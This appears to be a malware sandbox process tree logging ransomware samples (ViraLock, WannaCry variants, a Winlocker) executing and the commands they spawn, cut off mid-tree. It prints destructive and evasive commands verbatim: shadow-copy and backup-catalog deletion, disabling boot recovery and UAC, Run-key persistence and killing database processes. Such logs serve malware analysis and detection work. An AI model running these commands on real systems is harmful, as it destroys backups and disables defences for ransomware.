                                                                                          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\toYAcoQw.bat" "C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Ransomware\ViraLock.exe""
                                                                                          16⤵
                                                                                            PID:3800
                                                                                            • C:\Windows\SysWOW64\cscript.exe
                                                                                              cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
                                                                                              17⤵
                                                                                              • System Location Discovery: System Language Discovery
                                                                                              PID:6864
                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
                                                                                        14⤵
                                                                                        • Modifies visibility of file extensions in Explorer
                                                                                        • System Location Discovery: System Language Discovery
                                                                                        • Modifies registry key
                                                                                        PID:4292
                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
                                                                                        14⤵
                                                                                        • Modifies registry key
                                                                                        PID:5016
                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
                                                                                        14⤵
                                                                                        • UAC bypass
                                                                                        • System Location Discovery: System Language Discovery
                                                                                        • Modifies registry key
                                                                                        PID:2688
                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\VqgAcQgY.bat" "C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Ransomware\ViraLock.exe""
                                                                                        14⤵
                                                                                        • System Location Discovery: System Language Discovery
                                                                                        PID:1968
                                                                                        • C:\Windows\SysWOW64\cscript.exe
                                                                                          cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
                                                                                          15⤵
                                                                                            PID:1064
                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                      reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
                                                                                      12⤵
                                                                                      • Modifies visibility of file extensions in Explorer
                                                                                      • Modifies registry key
                                                                                      PID:324
                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                      reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
                                                                                      12⤵
                                                                                      • Modifies registry key
                                                                                      PID:2500
                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                      reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
                                                                                      12⤵
                                                                                      • UAC bypass
                                                                                      • System Location Discovery: System Language Discovery
                                                                                      • Modifies registry key
                                                                                      PID:1128
                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\NEQkwcYs.bat" "C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Ransomware\ViraLock.exe""
                                                                                      12⤵
                                                                                      • System Location Discovery: System Language Discovery
                                                                                      PID:800
                                                                                      • C:\Windows\SysWOW64\cscript.exe
                                                                                        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
                                                                                        13⤵
                                                                                        • System Location Discovery: System Language Discovery
                                                                                        PID:3236
                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                  reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
                                                                                  10⤵
                                                                                  • Modifies visibility of file extensions in Explorer
                                                                                  • System Location Discovery: System Language Discovery
                                                                                  • Modifies registry key
                                                                                  PID:2640
                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                  reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
                                                                                  10⤵
                                                                                  • System Location Discovery: System Language Discovery
                                                                                  • Modifies registry key
                                                                                  PID:3640
                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                  reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
                                                                                  10⤵
                                                                                  • UAC bypass
                                                                                  • System Location Discovery: System Language Discovery
                                                                                  • Modifies registry key
                                                                                  PID:2644
                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FKEosAQA.bat" "C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Ransomware\ViraLock.exe""
                                                                                  10⤵
                                                                                    PID:2112
                                                                                    • C:\Windows\SysWOW64\cscript.exe
                                                                                      cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
                                                                                      11⤵
                                                                                      • System Location Discovery: System Language Discovery
                                                                                      PID:3228
                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
                                                                                8⤵
                                                                                • Modifies visibility of file extensions in Explorer
                                                                                • Modifies registry key
                                                                                PID:4444
                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
                                                                                8⤵
                                                                                • Modifies registry key
                                                                                PID:3784
                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
                                                                                8⤵
                                                                                • UAC bypass
                                                                                • Modifies registry key
                                                                                PID:1564
                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mAssswsc.bat" "C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Ransomware\ViraLock.exe""
                                                                                8⤵
                                                                                  PID:3932
                                                                                  • C:\Windows\SysWOW64\cscript.exe
                                                                                    cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
                                                                                    9⤵
                                                                                    • System Location Discovery: System Language Discovery
                                                                                    PID:4040
                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                              reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
                                                                              6⤵
                                                                              • Modifies visibility of file extensions in Explorer
                                                                              • Modifies registry key
                                                                              PID:2632
                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                              reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
                                                                              6⤵
                                                                              • System Location Discovery: System Language Discovery
                                                                              • Modifies registry key
                                                                              PID:3008
                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                              reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
                                                                              6⤵
                                                                              • UAC bypass
                                                                              • System Location Discovery: System Language Discovery
                                                                              • Modifies registry key
                                                                              PID:5080
                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                              C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\eyIscAIk.bat" "C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Ransomware\ViraLock.exe""
                                                                              6⤵
                                                                                PID:892
                                                                                • C:\Windows\SysWOW64\cscript.exe
                                                                                  cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
                                                                                  7⤵
                                                                                  • System Location Discovery: System Language Discovery
                                                                                  PID:3652
                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                            reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
                                                                            4⤵
                                                                            • Modifies visibility of file extensions in Explorer
                                                                            • Modifies registry key
                                                                            PID:3976
                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                            reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
                                                                            4⤵
                                                                            • Modifies registry key
                                                                            PID:1572
                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                            reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
                                                                            4⤵
                                                                            • UAC bypass
                                                                            • Modifies registry key
                                                                            PID:2708
                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                            C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\IIIYwgMU.bat" "C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Ransomware\ViraLock.exe""
                                                                            4⤵
                                                                              PID:2672
                                                                              • C:\Windows\SysWOW64\cscript.exe
                                                                                cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
                                                                                5⤵
                                                                                • System Location Discovery: System Language Discovery
                                                                                PID:4796
                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                          reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
                                                                          2⤵
                                                                          • Modifies visibility of file extensions in Explorer
                                                                          • Modifies registry key
                                                                          PID:2148
                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                          reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
                                                                          2⤵
                                                                          • Modifies registry key
                                                                          PID:684
                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                          reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
                                                                          2⤵
                                                                          • UAC bypass
                                                                          • Modifies registry key
                                                                          PID:2080
                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\hgkwogkQ.bat" "C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Ransomware\ViraLock.exe""
                                                                          2⤵
                                                                            PID:2392
                                                                            • C:\Windows\SysWOW64\cscript.exe
                                                                              cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
                                                                              3⤵
                                                                              • System Location Discovery: System Language Discovery
                                                                              PID:3308
                                                                        • C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Ransomware\WannaCry.exe
                                                                          "C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Ransomware\WannaCry.exe"
                                                                          1⤵
                                                                          • Drops startup file
                                                                          • Adds Run key to start application
                                                                          PID:3516
                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                            C:\Windows\system32\cmd.exe /c 36341738422429.bat
                                                                            2⤵
                                                                              PID:4060
                                                                              • C:\Windows\SysWOW64\cscript.exe
                                                                                cscript //nologo c.vbs
                                                                                3⤵
                                                                                • System Location Discovery: System Language Discovery
                                                                                PID:3260
                                                                            • C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Ransomware\!WannaDecryptor!.exe
                                                                              !WannaDecryptor!.exe f
                                                                              2⤵
                                                                              • Executes dropped EXE
                                                                              • Suspicious use of SetWindowsHookEx
                                                                              PID:2632
                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                              taskkill /f /im MSExchange*
                                                                              2⤵
                                                                              • System Location Discovery: System Language Discovery
                                                                              • Kills process with taskkill
                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                              PID:2816
                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                              taskkill /f /im Microsoft.Exchange.*
                                                                              2⤵
                                                                              • System Location Discovery: System Language Discovery
                                                                              • Kills process with taskkill
                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                              PID:2024
                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                              taskkill /f /im sqlserver.exe
                                                                              2⤵
                                                                              • System Location Discovery: System Language Discovery
                                                                              • Kills process with taskkill
                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                              PID:1628
                                                                              • C:\Windows\System32\Conhost.exe
                                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                3⤵
                                                                                  PID:3228
                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                taskkill /f /im sqlwriter.exe
                                                                                2⤵
                                                                                • Kills process with taskkill
                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                PID:3440
                                                                              • C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Ransomware\!WannaDecryptor!.exe
                                                                                !WannaDecryptor!.exe c
                                                                                2⤵
                                                                                • Executes dropped EXE
                                                                                • Suspicious use of SetWindowsHookEx
                                                                                PID:5636
                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                cmd.exe /c start /b !WannaDecryptor!.exe v
                                                                                2⤵
                                                                                • System Location Discovery: System Language Discovery
                                                                                PID:5644
                                                                                • C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Ransomware\!WannaDecryptor!.exe
                                                                                  !WannaDecryptor!.exe v
                                                                                  3⤵
                                                                                  • Executes dropped EXE
                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                  PID:5228
                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                    cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
                                                                                    4⤵
                                                                                      PID:6980
                                                                                      • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                        wmic shadowcopy delete
                                                                                        5⤵
                                                                                          PID:7000
                                                                                  • C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Ransomware\!WannaDecryptor!.exe
                                                                                    !WannaDecryptor!.exe
                                                                                    2⤵
                                                                                    • Executes dropped EXE
                                                                                    • Sets desktop wallpaper using registry
                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                    PID:5596
                                                                                • C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Ransomware\WannaCrypt0r.exe
                                                                                  "C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Ransomware\WannaCrypt0r.exe"
                                                                                  1⤵
                                                                                  • Drops startup file
                                                                                  • Sets desktop wallpaper using registry
                                                                                  • System Location Discovery: System Language Discovery
                                                                                  PID:5028
                                                                                  • C:\Windows\SysWOW64\attrib.exe
                                                                                    attrib +h .
                                                                                    2⤵
                                                                                    • Views/modifies file attributes
                                                                                    PID:2640
                                                                                  • C:\Windows\SysWOW64\icacls.exe
                                                                                    icacls . /grant Everyone:F /T /C /Q
                                                                                    2⤵
                                                                                    • Modifies file permissions
                                                                                    • System Location Discovery: System Language Discovery
                                                                                    PID:2672
                                                                                  • C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Ransomware\taskdl.exe
                                                                                    taskdl.exe
                                                                                    2⤵
                                                                                    • Executes dropped EXE
                                                                                    PID:932
                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                    C:\Windows\system32\cmd.exe /c 90941738422431.bat
                                                                                    2⤵
                                                                                    • System Location Discovery: System Language Discovery
                                                                                    PID:1144
                                                                                    • C:\Windows\SysWOW64\cscript.exe
                                                                                      cscript.exe //nologo m.vbs
                                                                                      3⤵
                                                                                        PID:7096
                                                                                    • C:\Windows\SysWOW64\attrib.exe
                                                                                      attrib +h +s F:\$RECYCLE
                                                                                      2⤵
                                                                                      • Views/modifies file attributes
                                                                                      PID:908
                                                                                      • C:\Windows\System32\Conhost.exe
                                                                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        3⤵
                                                                                          PID:1064
                                                                                      • C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Ransomware\@[email protected]
                                                                                        @[email protected] co
                                                                                        2⤵
                                                                                        • Executes dropped EXE
                                                                                        • System Location Discovery: System Language Discovery
                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                        PID:5804
                                                                                        • C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Ransomware\TaskData\Tor\taskhsvc.exe
                                                                                          TaskData\Tor\taskhsvc.exe
                                                                                          3⤵
                                                                                          • Executes dropped EXE
                                                                                          • Loads dropped DLL
                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                          PID:5400
                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                        cmd.exe /c start /b @[email protected] vs
                                                                                        2⤵
                                                                                          PID:5336
                                                                                          • C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Ransomware\@[email protected]
                                                                                            @[email protected] vs
                                                                                            3⤵
                                                                                            • Executes dropped EXE
                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                            PID:5852
                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                              cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
                                                                                              4⤵
                                                                                              • System Location Discovery: System Language Discovery
                                                                                              PID:7088
                                                                                              • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                wmic shadowcopy delete
                                                                                                5⤵
                                                                                                • System Location Discovery: System Language Discovery
                                                                                                PID:1800
                                                                                        • C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Ransomware\taskse.exe
                                                                                          taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Ransomware\@[email protected]
                                                                                          2⤵
                                                                                          • Executes dropped EXE
                                                                                          • System Location Discovery: System Language Discovery
                                                                                          PID:5464
                                                                                        • C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Ransomware\@[email protected]
                                                                                          @[email protected]
                                                                                          2⤵
                                                                                          • Executes dropped EXE
                                                                                          • Sets desktop wallpaper using registry
                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                          PID:6084
                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                          cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "tgikesyrkli880" /t REG_SZ /d "\"C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Ransomware\tasksche.exe\"" /f
                                                                                          2⤵
                                                                                          • System Location Discovery: System Language Discovery
                                                                                          PID:6428
                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                            reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "tgikesyrkli880" /t REG_SZ /d "\"C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Ransomware\tasksche.exe\"" /f
                                                                                            3⤵
                                                                                            • Adds Run key to start application
                                                                                            • Modifies registry key
                                                                                            PID:1144
                                                                                        • C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Ransomware\taskdl.exe
                                                                                          taskdl.exe
                                                                                          2⤵
                                                                                          • Executes dropped EXE
                                                                                          PID:360
                                                                                        • C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Ransomware\taskse.exe
                                                                                          taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Ransomware\@[email protected]
                                                                                          2⤵
                                                                                          • Executes dropped EXE
                                                                                          • System Location Discovery: System Language Discovery
                                                                                          PID:7116
                                                                                        • C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Ransomware\@[email protected]
                                                                                          @[email protected]
                                                                                          2⤵
                                                                                          • Executes dropped EXE
                                                                                          • System Location Discovery: System Language Discovery
                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                          PID:3468
                                                                                        • C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Ransomware\taskdl.exe
                                                                                          taskdl.exe
                                                                                          2⤵
                                                                                          • Executes dropped EXE
                                                                                          PID:6956
                                                                                        • C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Ransomware\taskse.exe
                                                                                          taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Ransomware\@[email protected]
                                                                                          2⤵
                                                                                          • Executes dropped EXE
                                                                                          PID:6768
                                                                                        • C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Ransomware\@[email protected]
                                                                                          @[email protected]
                                                                                          2⤵
                                                                                          • Executes dropped EXE
                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                          PID:292
                                                                                        • C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Ransomware\taskdl.exe
                                                                                          taskdl.exe
                                                                                          2⤵
                                                                                          • Executes dropped EXE
                                                                                          • System Location Discovery: System Language Discovery
                                                                                          PID:312
                                                                                        • C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Ransomware\taskse.exe
                                                                                          taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Ransomware\@[email protected]
                                                                                          2⤵
                                                                                          • Executes dropped EXE
                                                                                          PID:1732
                                                                                        • C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Ransomware\@[email protected]
                                                                                          @[email protected]
                                                                                          2⤵
                                                                                          • Executes dropped EXE
                                                                                          • System Location Discovery: System Language Discovery
                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                          PID:5452
                                                                                        • C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Ransomware\taskdl.exe
                                                                                          taskdl.exe
                                                                                          2⤵
                                                                                          • Executes dropped EXE
                                                                                          • System Location Discovery: System Language Discovery
                                                                                          PID:5380
                                                                                        • C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Ransomware\taskse.exe
                                                                                          taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Ransomware\@[email protected]
                                                                                          2⤵
                                                                                          • Executes dropped EXE
                                                                                          • System Location Discovery: System Language Discovery
                                                                                          PID:5888
                                                                                        • C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Ransomware\@[email protected]
                                                                                          @[email protected]
                                                                                          2⤵
                                                                                          • Executes dropped EXE
                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                          PID:860
                                                                                        • C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Ransomware\taskdl.exe
                                                                                          taskdl.exe
                                                                                          2⤵
                                                                                          • Executes dropped EXE
                                                                                          • System Location Discovery: System Language Discovery
                                                                                          PID:4044
                                                                                        • C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Ransomware\taskse.exe
                                                                                          taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Ransomware\@[email protected]
                                                                                          2⤵
                                                                                          • Executes dropped EXE
                                                                                          PID:6776
                                                                                        • C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Ransomware\@[email protected]
                                                                                          @[email protected]
                                                                                          2⤵
                                                                                          • Executes dropped EXE
                                                                                          • System Location Discovery: System Language Discovery
                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                          PID:236
                                                                                        • C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Ransomware\taskdl.exe
                                                                                          taskdl.exe
                                                                                          2⤵
                                                                                          • Executes dropped EXE
                                                                                          PID:6536
                                                                                        • C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Ransomware\taskse.exe
                                                                                          taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Ransomware\@[email protected]
                                                                                          2⤵
                                                                                          • Executes dropped EXE
                                                                                          • System Location Discovery: System Language Discovery
                                                                                          PID:5336
                                                                                        • C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Ransomware\@[email protected]
                                                                                          @[email protected]
                                                                                          2⤵
                                                                                          • Executes dropped EXE
                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                          PID:1436
                                                                                        • C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Ransomware\taskdl.exe
                                                                                          taskdl.exe
                                                                                          2⤵
                                                                                          • Executes dropped EXE
                                                                                          • System Location Discovery: System Language Discovery
                                                                                          PID:1072
                                                                                        • C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Ransomware\taskse.exe
                                                                                          taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Ransomware\@[email protected]
                                                                                          2⤵
                                                                                          • Executes dropped EXE
                                                                                          PID:1540
                                                                                        • C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Ransomware\@[email protected]
                                                                                          @[email protected]
                                                                                          2⤵
                                                                                          • Executes dropped EXE
                                                                                          • System Location Discovery: System Language Discovery
                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                          PID:5632
                                                                                        • C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Ransomware\taskdl.exe
                                                                                          taskdl.exe
                                                                                          2⤵
                                                                                          • Executes dropped EXE
                                                                                          • System Location Discovery: System Language Discovery
                                                                                          PID:5052
                                                                                        • C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Ransomware\taskse.exe
                                                                                          taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Ransomware\@[email protected]
                                                                                          2⤵
                                                                                          • Executes dropped EXE
                                                                                          PID:5900
                                                                                        • C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Ransomware\@[email protected]
                                                                                          @[email protected]
                                                                                          2⤵
                                                                                          • Executes dropped EXE
                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                          PID:5940
                                                                                        • C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Ransomware\taskdl.exe
                                                                                          taskdl.exe
                                                                                          2⤵
                                                                                          • Executes dropped EXE
                                                                                          PID:6496
                                                                                      • C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Ransomware\WinlockerVB6Blacksod.exe
                                                                                        "C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Ransomware\WinlockerVB6Blacksod.exe"
                                                                                        1⤵
                                                                                        • Loads dropped DLL
                                                                                        • Enumerates connected drives
                                                                                        • System Location Discovery: System Language Discovery
                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                        PID:3912
                                                                                        • C:\Windows\SysWOW64\msiexec.exe
